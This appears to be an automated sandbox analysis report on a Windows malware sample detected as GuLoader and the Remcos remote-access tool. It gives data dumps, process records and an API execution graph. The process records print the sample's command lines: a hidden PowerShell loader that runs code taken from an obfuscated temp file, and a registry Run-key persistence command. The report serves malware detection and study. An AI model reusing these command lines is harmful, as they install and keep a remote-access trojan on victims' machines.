                                              2024-05-01 16:22:29 UTC1369INData Raw: 2e 47 09 4d ba d7 86 87 cf 43 bf d8 a3 8b 11 c5 06 ef f2 cf f5 21 12 7a 2e e0 c9 b6 5e 5e b3 05 a6 5a 16 32 66 b4 a8 25 47 77 3f ff 49 b2 18 8d b6 1f ca 88 15 d8 67 8d 68 db 29 e1 55 ce 95 a1 73 4a 5d fc ef b1 c9 91 2f 8f 8c 19 10 e4 76 6e 15 7f 43 d0 da 44 a1 9d 74 54 3a d5 3d 0f 6f fc c8 99 2e 8b 9f 9c ca 17 52 44 53 86 b1 29 5f 7e 82 70 a3 c0 8f c9 32 0d f2 42 63 40 ac e3 d0 87 e6 2f 88 94 00 74 73 62 e9 d7 c2 88 7f bb a1 69 6c 4e fd 6e 39 c1 eb 1c 76 af 08 49 8c 1f ea a7 3a 26 e7 66 5f 5f 50 91 16 c2 10 41 31 ee 11 e3 f5 a2 01 32 0d 31 fd 19 ab 7e f3 58 ef cf 8f c7 ef ad 51 97 10 dd 60 24 d7 ae 06 86 0d 63 a6 de 35 3e 32 92 d2 e9 6d af 6c 21 58 50 b1 37 d1 84 98 39 ea fe ac 51 d6 89 cc fa a9 14 e2 66 5f 34 2e 8f ea d4 8a 9e 64 81 ad e4 e1 4e a8 3b 7e
                                              Data Ascii: .GMC!z.^^Z2f%Gw?Igh)UsJ]/vnCDtT:=o.RDS)_~p2Bc@/tsbilNn9vI:&f__PA121~XQ`$c5>2ml!XP79Qf_4.dN;~
                                              2024-05-01 16:22:29 UTC1369INData Raw: 44 ac e1 04 5b 9b 05 45 71 30 bc 32 38 10 88 42 e3 fb 15 f6 58 ce de e8 2c d4 e2 d2 aa 31 2d 12 92 6a 4d 2a 4c ec 24 46 0c ce 70 52 b9 a3 3a 9b bd a7 4b 2f 4e 95 e8 a9 80 42 87 ef 8b 43 5d e4 d4 3f a3 6a 9e d4 af 37 25 65 e1 13 2b 6b 55 4f a6 ce 3e 00 cc 91 d8 11 fc 9e d5 e8 d6 49 67 01 4d fe 64 6e 85 e1 7f e3 88 d7 90 f0 4d 5a 7a fe a7 d4 61 ae 28 0d 80 68 6f 11 14 c2 9d 46 ff c6 ce 50 ef df 0c 38 aa cd b6 c5 c0 71 0e b4 70 e2 68 7a 2b fb 06 41 dc 6c 8a 6d 10 4a 81 aa fc f7 0c dc 27 6f f6 01 22 b8 ef fc cd 72 67 69 11 f3 82 ce a2 8d 7c 6c 64 6d 8e 6a b0 0b 64 08 88 a3 cd 92 3c 58 ea 35 bc 2a 91 20 4a 7f 1b fa f7 14 7f 23 c1 ba 09 24 50 fe eb d8 86 60 7a 16 5a 06 2d ec 06 15 b0 e7 f5 66 da bc 49 f4 08 e5 39 f1 1a 1c ea 1d 07 20 1b d3 ae 52 37 d7 ea ec 31
                                              Data Ascii: D[Eq028BX,1-jM*L$FpR:K/NBC]?j7%e+kUO>IgMdnMZza(hoFP8qphz+AlmJ'o"rgi|ldmjd<X5* J#$P`zZ-fI9 R71


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:18:19:12
                                              Start date:01/05/2024
                                              Path:C:\Users\user\Desktop\documento.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\documento.exe"
                                              Imagebase:0x400000
                                              File size:833'309 bytes
                                              MD5 hash:518C32EDF768D3BE4F268071E0722A0F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:3
                                              Start time:18:19:27
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"powershell.exe" -windowstyle hidden "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
                                              Imagebase:0xba0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.538410512.000000000839B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:5
                                              Start time:18:19:31
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                              Imagebase:0x4a360000
                                              File size:302'592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:18:20:22
                                              Start date:01/05/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0xaa0000
                                              File size:516'096 bytes
                                              MD5 hash:EF162817C730DB9355F6C28F2445D206
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000006.00000002.866892514.0000000000449000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:false

                                              General

                                              Target ID:7
                                              Start time:18:20:36
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
                                              Imagebase:0x4a900000
                                              File size:302'592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:9
                                              Start time:18:20:36
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\reg.exe
                                              Wow64 process (32bit):true
                                              Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%knkbrdet% -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;%knkbrdet% ($Preeternal)"
                                              Imagebase:0x50000
                                              File size:62'464 bytes
                                              MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:18:20:45
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
                                              Imagebase:0xba0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:18:20:47
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
                                              Imagebase:0xba0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000F.00000002.783334592.00000000083F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:18:20:50
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                              Imagebase:0x4a7c0000
                                              File size:302'592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:18:20:55
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -windowstyle minimized $Preeternal=(Get-ItemProperty -Path 'HKCU:\Morassweed\').Herbalize;c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ($Preeternal)
                                              Imagebase:0xba0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:19
                                              Start time:18:20:59
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "$Linksman=Get-Content 'C:\Users\user\AppData\Local\Temp\Deinotherium\Jordagtig138\Unmonotonous\Iraqian\Fermentatively.Bry';$Curiet136=$Linksman.SubString(57835,3);.$Curiet136($Linksman)"
                                              Imagebase:0xba0000
                                              File size:427'008 bytes
                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000013.00000002.791285733.00000000085E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:20
                                              Start time:18:21:02
                                              Start date:01/05/2024
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                              Imagebase:0x4a660000
                                              File size:302'592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:21
                                              Start time:18:22:00
                                              Start date:01/05/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0xaa0000
                                              File size:516'096 bytes
                                              MD5 hash:EF162817C730DB9355F6C28F2445D206
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:22
                                              Start time:18:22:06
                                              Start date:01/05/2024
                                              Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                              Imagebase:0xaa0000
                                              File size:516'096 bytes
                                              MD5 hash:EF162817C730DB9355F6C28F2445D206
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:21.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:23.6%
                                                Total number of Nodes:1278
                                                Total number of Limit Nodes:31
                                                execution_graph 3824 4027c1 3825 402a1d 18 API calls 3824->3825 3826 4027c7 3825->3826 3827 402802 3826->3827 3828 4027eb 3826->3828 3837 4026a6 3826->3837 3829 402818 3827->3829 3830 40280c 3827->3830 3832 4027f0 3828->3832 3833 4027ff 3828->3833 3831 405d1f 18 API calls 3829->3831 3834 402a1d 18 API calls 3830->3834 3831->3833 3838 405cfd lstrcpynA 3832->3838 3833->3837 3839 405c5b wsprintfA 3833->3839 3834->3833 3838->3837 3839->3837 3840 401cc2 3841 402a1d 18 API calls 3840->3841 3842 401cd2 SetWindowLongA 3841->3842 3843 4028cf 3842->3843 3844 401a43 3845 402a1d 18 API calls 3844->3845 3846 401a49 3845->3846 3847 402a1d 18 API calls 3846->3847 3848 4019f3 3847->3848 3125 401e44 3126 402a3a 18 API calls 3125->3126 3127 401e4a 3126->3127 3128 404f16 25 API calls 3127->3128 3129 401e54 3128->3129 3141 40548e CreateProcessA 3129->3141 3131 401eb0 CloseHandle 3133 4026a6 3131->3133 3132 401e79 WaitForSingleObject 3134 401e5a 3132->3134 3135 401e87 GetExitCodeProcess 3132->3135 3134->3131 3134->3132 3134->3133 3144 4060ce 3134->3144 3136 401ea4 3135->3136 3137 401e99 3135->3137 3136->3131 3140 401ea2 3136->3140 3148 405c5b wsprintfA 3137->3148 3140->3131 3142 4054c1 CloseHandle 3141->3142 3143 4054cd 3141->3143 3142->3143 3143->3134 3145 4060eb PeekMessageA 3144->3145 3146 4060e1 DispatchMessageA 3145->3146 3147 4060fb 3145->3147 3146->3145 3147->3132 3148->3140 3849 402644 3850 40264a 3849->3850 3851 402652 FindClose 3850->3851 3852 4028cf 3850->3852 3851->3852 3853 406344 3854 4061c8 3853->3854 3855 406b33 3854->3855 3856 406252 GlobalAlloc 3854->3856 3857 406249 GlobalFree 3854->3857 3858 4062c0 GlobalFree 3854->3858 3859 4062c9 GlobalAlloc 3854->3859 3856->3854 3856->3855 3857->3856 3858->3859 3859->3854 3859->3855 3860 4026c6 3861 402a3a 18 API calls 3860->3861 3862 4026d4 3861->3862 3863 4026ea 3862->3863 3865 402a3a 18 API calls 3862->3865 3864 40594b 2 API calls 3863->3864 3866 4026f0 3864->3866 3865->3863 3888 405970 GetFileAttributesA CreateFileA 3866->3888 3868 4026fd 3869 4027a0 3868->3869 3870 402709 GlobalAlloc 3868->3870 3873 4027a8 DeleteFileA 3869->3873 3874 4027bb 3869->3874 3871 402722 3870->3871 3872 402797 CloseHandle 3870->3872 3889 403091 SetFilePointer 3871->3889 3872->3869 3873->3874 3876 402728 3877 40307b ReadFile 3876->3877 3878 402731 GlobalAlloc 3877->3878 3879 402741 3878->3879 3880 402775 3878->3880 3882 402e9f 36 API calls 3879->3882 3881 405a17 WriteFile 3880->3881 3883 402781 GlobalFree 3881->3883 3887 40274e 3882->3887 3884 402e9f 36 API calls 3883->3884 3886 402794 3884->3886 3885 40276c GlobalFree 3885->3880 3886->3872 3887->3885 3888->3868 3889->3876 3890 402847 3891 402a1d 18 API calls 3890->3891 3892 40284d 3891->3892 3893 40287e 3892->3893 3894 4026a6 3892->3894 3896 40285b 3892->3896 3893->3894 3895 405d1f 18 API calls 3893->3895 3895->3894 3896->3894 3898 405c5b wsprintfA 3896->3898 3898->3894 3899 4022c7 3900 402a3a 18 API calls 3899->3900 3901 4022d8 3900->3901 3902 402a3a 18 API calls 3901->3902 3903 4022e1 3902->3903 3904 402a3a 18 API calls 3903->3904 3905 4022eb GetPrivateProfileStringA 3904->3905 3348 401751 3349 402a3a 18 API calls 3348->3349 3350 401758 3349->3350 3351 401776 3350->3351 3352 40177e 3350->3352 3390 405cfd lstrcpynA 3351->3390 3391 405cfd lstrcpynA 3352->3391 3355 40177c 3359 405f68 5 API calls 3355->3359 3356 401789 3392 40576f lstrlenA CharPrevA 3356->3392 3366 40179b 3359->3366 3360 406001 2 API calls 3360->3366 3363 4017b2 CompareFileTime 3363->3366 3364 401876 3365 404f16 25 API calls 3364->3365 3367 401880 3365->3367 3366->3360 3366->3363 3366->3364 3369 405cfd lstrcpynA 3366->3369 3373 405d1f 18 API calls 3366->3373 3384 40184d 3366->3384 3386 40594b GetFileAttributesA 3366->3386 3389 405970 GetFileAttributesA CreateFileA 3366->3389 3395 4054f3 3366->3395 3370 402e9f 36 API calls 3367->3370 3368 404f16 25 API calls 3385 401862 3368->3385 3369->3366 3371 401893 3370->3371 3372 4018a7 SetFileTime 3371->3372 3374 4018b9 CloseHandle 3371->3374 3372->3374 3373->3366 3375 4018ca 3374->3375 3374->3385 3376 4018e2 3375->3376 3377 4018cf 3375->3377 3379 405d1f 18 API calls 3376->3379 3378 405d1f 18 API calls 3377->3378 3381 4018d7 lstrcatA 3378->3381 3382 4018ea 3379->3382 3381->3382 3383 4054f3 MessageBoxIndirectA 3382->3383 3383->3385 3384->3368 3384->3385 3387 40596a 3386->3387 3388 40595d SetFileAttributesA 3386->3388 3387->3366 3388->3387 3389->3366 3390->3355 3391->3356 3393 40178f lstrcatA 3392->3393 3394 405789 lstrcatA 3392->3394 3393->3355 3394->3393 3396 405508 3395->3396 3397 405554 3396->3397 3398 40551c MessageBoxIndirectA 3396->3398 3397->3366 3398->3397 3916 401651 3917 402a3a 18 API calls 3916->3917 3918 401657 3917->3918 3919 406001 2 API calls 3918->3919 3920 40165d 3919->3920 3921 401951 3922 402a1d 18 API calls 3921->3922 3923 401958 3922->3923 3924 402a1d 18 API calls 3923->3924 3925 401962 3924->3925 3926 402a3a 18 API calls 3925->3926 3927 40196b 3926->3927 3928 40197e lstrlenA 3927->3928 3929 4019b9 3927->3929 3930 401988 3928->3930 3930->3929 3934 405cfd lstrcpynA 3930->3934 3932 4019a2 3932->3929 3933 4019af lstrlenA 3932->3933 3933->3929 3934->3932 3935 4019d2 3936 402a3a 18 API calls 3935->3936 3937 4019d9 3936->3937 3938 402a3a 18 API calls 3937->3938 3939 4019e2 3938->3939 3940 4019e9 lstrcmpiA 3939->3940 3941 4019fb lstrcmpA 3939->3941 3942 4019ef 3940->3942 3941->3942 3943 4021d2 3944 402a3a 18 API calls 3943->3944 3945 4021d8 3944->3945 3946 402a3a 18 API calls 3945->3946 3947 4021e1 3946->3947 3948 402a3a 18 API calls 3947->3948 3949 4021ea 3948->3949 3950 406001 2 API calls 3949->3950 3951 4021f3 3950->3951 3952 402204 lstrlenA lstrlenA 3951->3952 3953 4021f7 3951->3953 3955 404f16 25 API calls 3952->3955 3954 404f16 25 API calls 3953->3954 3957 4021ff 3953->3957 3954->3957 3956 402240 SHFileOperationA 3955->3956 3956->3953 3956->3957 3446 405054 3447 405076 GetDlgItem GetDlgItem GetDlgItem 3446->3447 3448 4051ff 3446->3448 3491 403f17 SendMessageA 3447->3491 3450 405207 GetDlgItem CreateThread CloseHandle 3448->3450 3451 40522f 3448->3451 3450->3451 3494 404fe8 OleInitialize 3450->3494 3453 405245 ShowWindow ShowWindow 3451->3453 3454 40527e 3451->3454 3455 40525d 3451->3455 3452 4050e6 3457 4050ed GetClientRect GetSystemMetrics SendMessageA SendMessageA 3452->3457 3493 403f17 SendMessageA 3453->3493 3461 403f49 8 API calls 3454->3461 3456 4052b8 3455->3456 3459 405291 ShowWindow 3455->3459 3460 40526d 3455->3460 3456->3454 3464 4052c5 SendMessageA 3456->3464 3462 40515b 3457->3462 3463 40513f SendMessageA SendMessageA 3457->3463 3467 4052b1 3459->3467 3468 4052a3 3459->3468 3465 403ebb SendMessageA 3460->3465 3466 40528a 3461->3466 3471 405160 SendMessageA 3462->3471 3472 40516e 3462->3472 3463->3462 3464->3466 3473 4052de CreatePopupMenu 3464->3473 3465->3454 3470 403ebb SendMessageA 3467->3470 3469 404f16 25 API calls 3468->3469 3469->3467 3470->3456 3471->3472 3475 403ee2 19 API calls 3472->3475 3474 405d1f 18 API calls 3473->3474 3476 4052ee AppendMenuA 3474->3476 3477 40517e 3475->3477 3478 40530c GetWindowRect 3476->3478 3479 40531f TrackPopupMenu 3476->3479 3480 405187 ShowWindow 3477->3480 3481 4051bb GetDlgItem SendMessageA 3477->3481 3478->3479 3479->3466 3483 40533b 3479->3483 3484 4051aa 3480->3484 3485 40519d ShowWindow 3480->3485 3481->3466 3482 4051e2 SendMessageA SendMessageA 3481->3482 3482->3466 3486 40535a SendMessageA 3483->3486 3492 403f17 SendMessageA 3484->3492 3485->3484 3486->3486 3487 405377 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3486->3487 3489 405399 SendMessageA 3487->3489 3489->3489 3490 4053bb GlobalUnlock SetClipboardData CloseClipboard 3489->3490 3490->3466 3491->3452 3492->3481 3493->3455 3495 403f2e SendMessageA 3494->3495 3498 40500b 3495->3498 3496 405032 3497 403f2e SendMessageA 3496->3497 3499 405044 OleUninitialize 3497->3499 3498->3496 3500 401389 2 API calls 3498->3500 3500->3498 3958 402254 3959 40225b 3958->3959 3962 40226e 3958->3962 3960 405d1f 18 API calls 3959->3960 3961 402268 3960->3961 3963 4054f3 MessageBoxIndirectA 3961->3963 3963->3962 3964 4014d6 3965 402a1d 18 API calls 3964->3965 3966 4014dc Sleep 3965->3966 3968 4028cf 3966->3968 3505 4030d9 SetErrorMode GetVersion 3506 403110 3505->3506 3507 403116 3505->3507 3508 406092 5 API calls 3506->3508 3509 406028 3 API calls 3507->3509 3508->3507 3510 40312c 3509->3510 3511 406028 3 API calls 3510->3511 3512 403136 3511->3512 3513 406028 3 API calls 3512->3513 3514 403140 3513->3514 3515 406092 5 API calls 3514->3515 3516 403147 3515->3516 3517 406092 5 API calls 3516->3517 3518 40314e #17 OleInitialize SHGetFileInfoA 3517->3518 3596 405cfd lstrcpynA 3518->3596 3520 40318b GetCommandLineA 3597 405cfd lstrcpynA 3520->3597 3522 40319d GetModuleHandleA 3523 4031b4 3522->3523 3524 40579a CharNextA 3523->3524 3525 4031c8 CharNextA 3524->3525 3534 4031d8 3525->3534 3526 4032a2 3527 4032b5 GetTempPathA 3526->3527 3598 4030a8 3527->3598 3529 4032cd 3531 4032d1 GetWindowsDirectoryA lstrcatA 3529->3531 3532 403327 DeleteFileA 3529->3532 3530 40579a CharNextA 3530->3534 3535 4030a8 12 API calls 3531->3535 3608 402c66 GetTickCount GetModuleFileNameA 3532->3608 3534->3526 3534->3530 3538 4032a4 3534->3538 3537 4032ed 3535->3537 3536 40333b 3541 4033c1 3536->3541 3545 40579a CharNextA 3536->3545 3591 4033d1 3536->3591 3537->3532 3540 4032f1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3537->3540 3692 405cfd lstrcpynA 3538->3692 3543 4030a8 12 API calls 3540->3543 3636 40367d 3541->3636 3547 40331f 3543->3547 3548 403356 3545->3548 3547->3532 3547->3591 3555 403401 3548->3555 3556 40339c 3548->3556 3549 403509 3552 403511 GetCurrentProcess OpenProcessToken 3549->3552 3553 40358b ExitProcess 3549->3553 3550 4033eb 3551 4054f3 MessageBoxIndirectA 3550->3551 3557 4033f9 ExitProcess 3551->3557 3558 40355c 3552->3558 3559 40352c LookupPrivilegeValueA AdjustTokenPrivileges 3552->3559 3562 405476 5 API calls 3555->3562 3693 40585d 3556->3693 3560 406092 5 API calls 3558->3560 3559->3558 3563 403563 3560->3563 3565 403406 lstrcatA 3562->3565 3566 403578 ExitWindowsEx 3563->3566 3570 403584 3563->3570 3567 403422 lstrcatA lstrcmpiA 3565->3567 3568 403417 lstrcatA 3565->3568 3566->3553 3566->3570 3569 40343e 3567->3569 3567->3591 3568->3567 3573 403443 3569->3573 3574 40344a 3569->3574 3575 40140b 2 API calls 3570->3575 3572 4033b6 3708 405cfd lstrcpynA 3572->3708 3577 4053dc 4 API calls 3573->3577 3578 405459 2 API calls 3574->3578 3575->3553 3579 403448 3577->3579 3580 40344f SetCurrentDirectoryA 3578->3580 3579->3580 3581 403469 3580->3581 3582 40345e 3580->3582 3717 405cfd lstrcpynA 3581->3717 3716 405cfd lstrcpynA 3582->3716 3585 405d1f 18 API calls 3586 4034a8 DeleteFileA 3585->3586 3587 4034b5 CopyFileA 3586->3587 3593 403477 3586->3593 3587->3593 3588 4034fd 3590 405bb8 38 API calls 3588->3590 3589 405bb8 38 API calls 3589->3593 3590->3591 3709 4035a3 3591->3709 3592 405d1f 18 API calls 3592->3593 3593->3585 3593->3588 3593->3589 3593->3592 3594 40548e 2 API calls 3593->3594 3595 4034e9 CloseHandle 3593->3595 3594->3593 3595->3593 3596->3520 3597->3522 3599 405f68 5 API calls 3598->3599 3600 4030b4 3599->3600 3601 4030be 3600->3601 3602 40576f 3 API calls 3600->3602 3601->3529 3603 4030c6 3602->3603 3604 405459 2 API calls 3603->3604 3605 4030cc 3604->3605 3718 40599f 3605->3718 3722 405970 GetFileAttributesA CreateFileA 3608->3722 3610 402ca6 3628 402cb6 3610->3628 3723 405cfd lstrcpynA 3610->3723 3612 402ccc 3724 4057b6 lstrlenA 3612->3724 3616 402cdd GetFileSize 3617 402dd9 3616->3617 3630 402cf4 3616->3630 3729 402c02 3617->3729 3619 402de2 3621 402e12 GlobalAlloc 3619->3621 3619->3628 3741 403091 SetFilePointer 3619->3741 3620 40307b ReadFile 3620->3630 3740 403091 SetFilePointer 3621->3740 3623 402e45 3625 402c02 6 API calls 3623->3625 3625->3628 3626 402dfb 3629 40307b ReadFile 3626->3629 3627 402e2d 3631 402e9f 36 API calls 3627->3631 3628->3536 3632 402e06 3629->3632 3630->3617 3630->3620 3630->3623 3630->3628 3633 402c02 6 API calls 3630->3633 3634 402e39 3631->3634 3632->3621 3632->3628 3633->3630 3634->3628 3634->3634 3635 402e76 SetFilePointer 3634->3635 3635->3628 3637 406092 5 API calls 3636->3637 3638 403691 3637->3638 3639 403697 3638->3639 3640 4036a9 3638->3640 3751 405c5b wsprintfA 3639->3751 3641 405be4 3 API calls 3640->3641 3642 4036d4 3641->3642 3643 4036f2 lstrcatA 3642->3643 3645 405be4 3 API calls 3642->3645 3646 4036a7 3643->3646 3645->3643 3742 403942 3646->3742 3649 40585d 18 API calls 3650 403724 3649->3650 3651 4037ad 3650->3651 3653 405be4 3 API calls 3650->3653 3652 40585d 18 API calls 3651->3652 3654 4037b3 3652->3654 3656 403750 3653->3656 3655 4037c3 LoadImageA 3654->3655 3657 405d1f 18 API calls 3654->3657 3658 403869 3655->3658 3659 4037ea RegisterClassA 3655->3659 3656->3651 3660 40376c lstrlenA 3656->3660 3663 40579a CharNextA 3656->3663 3657->3655 3662 40140b 2 API calls 3658->3662 3661 403820 SystemParametersInfoA CreateWindowExA 3659->3661 3691 403873 3659->3691 3664 4037a0 3660->3664 3665 40377a lstrcmpiA 3660->3665 3661->3658 3666 40386f 3662->3666 3667 40376a 3663->3667 3669 40576f 3 API calls 3664->3669 3665->3664 3668 40378a GetFileAttributesA 3665->3668 3671 403942 19 API calls 3666->3671 3666->3691 3667->3660 3670 403796 3668->3670 3672 4037a6 3669->3672 3670->3664 3673 4057b6 2 API calls 3670->3673 3674 403880 3671->3674 3752 405cfd lstrcpynA 3672->3752 3673->3664 3676 40388c ShowWindow 3674->3676 3677 40390f 3674->3677 3679 406028 3 API calls 3676->3679 3678 404fe8 5 API calls 3677->3678 3680 403915 3678->3680 3681 4038a4 3679->3681 3682 403931 3680->3682 3683 403919 3680->3683 3684 4038b2 GetClassInfoA 3681->3684 3686 406028 3 API calls 3681->3686 3685 40140b 2 API calls 3682->3685 3690 40140b 2 API calls 3683->3690 3683->3691 3687 4038c6 GetClassInfoA RegisterClassA 3684->3687 3688 4038dc DialogBoxParamA 3684->3688 3685->3691 3686->3684 3687->3688 3689 40140b 2 API calls 3688->3689 3689->3691 3690->3691 3691->3591 3692->3527 3754 405cfd lstrcpynA 3693->3754 3695 40586e 3696 405808 4 API calls 3695->3696 3697 405874 3696->3697 3698 4033a7 3697->3698 3699 405f68 5 API calls 3697->3699 3698->3591 3707 405cfd lstrcpynA 3698->3707 3704 405884 3699->3704 3700 4058af lstrlenA 3701 4058ba 3700->3701 3700->3704 3703 40576f 3 API calls 3701->3703 3702 406001 2 API calls 3702->3704 3705 4058bf GetFileAttributesA 3703->3705 3704->3698 3704->3700 3704->3702 3706 4057b6 2 API calls 3704->3706 3705->3698 3706->3700 3707->3572 3708->3541 3710 4035bb 3709->3710 3711 4035ad CloseHandle 3709->3711 3755 4035e8 3710->3755 3711->3710 3716->3581 3717->3593 3719 4059aa GetTickCount GetTempFileNameA 3718->3719 3720 4030d7 3719->3720 3721 4059d7 3719->3721 3720->3529 3721->3719 3721->3720 3722->3610 3723->3612 3725 4057c3 3724->3725 3726 402cd2 3725->3726 3727 4057c8 CharPrevA 3725->3727 3728 405cfd lstrcpynA 3726->3728 3727->3725 3727->3726 3728->3616 3730 402c23 3729->3730 3731 402c0b 3729->3731 3732 402c33 GetTickCount 3730->3732 3733 402c2b 3730->3733 3734 402c14 DestroyWindow 3731->3734 3735 402c1b 3731->3735 